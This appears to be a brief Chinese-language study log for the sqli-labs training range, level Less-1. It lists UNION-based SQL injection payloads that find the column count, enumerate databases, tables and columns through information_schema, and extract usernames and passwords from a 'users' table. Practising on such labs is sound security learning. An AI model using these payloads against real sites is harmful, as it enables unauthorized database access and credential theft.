SQLI labs 靶场学习记录

基础挑战1-20关

less-1

1' order by 3%23    //得到列数为3
-1' union select 1,2,group_concat(schema_name) from information_schema.schemata%23  //得到数据库名
-1' union select 1,group_concat(table_name),3 from information_schema.tables where table_schema= 'security'%23 //得到表名
-1' union select 1,group_concat(column_name),3 from information_schema.columns where table_name= 'users'%23 //得到列名
-1' union select 1,username,password from users where id=3%23 //爆破得到数据